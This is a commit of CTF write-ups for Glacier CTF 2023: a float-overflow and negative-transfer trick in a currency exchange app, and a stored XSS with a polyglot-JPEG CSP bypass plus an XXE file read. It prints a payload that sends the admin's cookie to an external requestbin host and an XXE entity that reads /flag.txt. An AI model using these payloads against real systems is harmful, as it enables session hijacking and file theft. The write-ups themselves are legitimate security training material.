First commit

Author: aleviscomi

2023/Glacier CTF 2023/web_glacier-exchange/README.md

@@ -0,0 +1,57 @@
+# Glacier Exchange
+
+_**Keywords:** Python Float Overflow_
+
+<img src="imgs/intro.png" alt="image" width="30%"/>
+
+Glacier Exchange is a web challenge that highlights a simple yet often overlooked Python vulnerability related to mathematical operations involving float variables.
+
+The challenge presents a web platform for currency exchange, with the initial portfolio situation depicted as follows:
+
+<img src="imgs/home.png" alt="image" width="50%"/>
+
+Upon inspecting the source code, it becomes apparent that to read the flag, one must have a balance of 1000000000 coins in "cashout" and 0 in other categories.
+
+```python
+def inGlacierClub(self):
+    with self.lock:
+        for balance_name in self.balances:
+            if balance_name == "cashout":
+                if self.balances[balance_name] < 1000000000:
+                    return False
+            else:
+                if self.balances[balance_name] != 0.0:
+                    return False
+        return True
+```
+
+Simultaneously, there is no validation on the user-entered amount for transactions:
+
+```python
+def transaction(self, source, dest, amount):
+    if source in self.balances and dest in self.balances:
+        with self.lock:
+            if self.balances[source] >= amount:
+                self.balances[source] -= amount
+                self.balances[dest] += amount
+                return 1
+    return 0
+```
+
+Thus, transactions can be made with negative amounts without any checks.
+
+Understanding this, the objective becomes generating currency. To achieve this, we can follow these steps:
+
+1. Transfer -1e+30 coins from "cashout" to "glaciercoin";
+
+2. Transfer -1000000000 coins from "doge" to "cashout." This exploits the Python Float Overflow vulnerability, causing subtractions between numbers of vastly different orders to be ignored. The addition, however, proceeds without issues. Essentially, new currency is generated;
+
+3. Transfer 1e+30 coins from "cashout" to "glaciercoin" to nullify the transaction from step 1;
+
+4. Transfer 1000000000 coins from "doge" to "cashout".
+
+After these steps, the desired situation is achieved.
+
+At this point, clicking "Join GlacierClub" yields the flag!
+
+<img src="imgs/flag.png" alt="image" width="50%"/>

2023/Glacier CTF 2023/web_glacier-exchange/imgs/flag.png

@@ -0,0 +1,65 @@
+# Peak
+
+_**Keywords:** Stored XSS, XXE, CSP Bypass, Polyglot JavaScript/JPEG_
+
+<img src="imgs/intro.png" alt="image" width="30%"/>
+
+Peak is a web challenge that exhibits two crucial vulnerabilities also found in the [OWASP Top 10](https://owasp.org/www-project-top-ten/):
+* Cross-Site Scripting (XSS)
+* XML External Entities (XXE)
+
+Upon user registration, an individual can store a message on the platform, which will later be reviewed by the admin.
+
+<img src="imgs/contact-us.png" alt="image" width="50%"/>
+
+However, the content entered into the "Message" field is not filtered, allowing the inclusion of scripts and malicious code.
+
+Attempting to store a message with the following content:
+
+```javascript
+<script>alert(1);</script>
+```
+
+and inspecting it through the provided link reveals that the code is not executed.
+
+This is due to the presence of the <code>Content-Security-Policy: script-src "self"</code> header in the response, preventing the execution of inline scripts. To bypass this mitigation, we leverage the image upload functionality to load a JPEG file containing JavaScript code (Polyglot JavaScript/JPEG), (***Polyglot JavaScript/JPEG***), as detailed [here](https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs).
+
+Using the hexadecimal editor **GHex**, we create the _'xss.jpg'_ image containing the following JS code:
+
+```javascript
+location.href="https://en6dm14fuwglk.x.pipedream.net/"+document.cookie
+```
+
+This allows us to retrieve the admin's cookie (https://en6dm14fuwglk.x.pipedream.net/ is an endpoint controlled directly by us, generated with **requestbin**).
+
+Next, we upload a message with the _'xss.jpg'_. image. It is stored on the server with the path _/uploads/&lt;id&gt;_. This step enables us to upload the file with the required code. The last step is to invoke it.
+
+We load a new message, this time inserting the following JS code into the "Message" field:
+
+```javascript
+<script charset="ISO-8859-1" src="/uploads/<id>"></script>
+```
+
+Done!\
+When the admin opens this message, the code embedded in the image is invoked, and their session cookie is sent to our endpoint.
+
+After obtaining the admin's session and accessing their profile, we discover a new "Edit Map" feature utilizing the XML language.
+
+<img src="imgs/admin.png" alt="image" width="50%"/>
+
+Here, we exploit an [XXE vulnerability](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files). By sending the following payload:
+
+```xml
+<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///flag.txt"> ]>
+<markers>
+    <marker>
+        <lat>47.0748663672</lat>
+        <lon>12.695247219</lon>
+        <name>&xxe;</name>
+    </marker>
+</markers>
+```
+
+we successfully retrieve the sought-after flag!
+
+<img src="imgs/flag.png" alt="image" width="50%"/>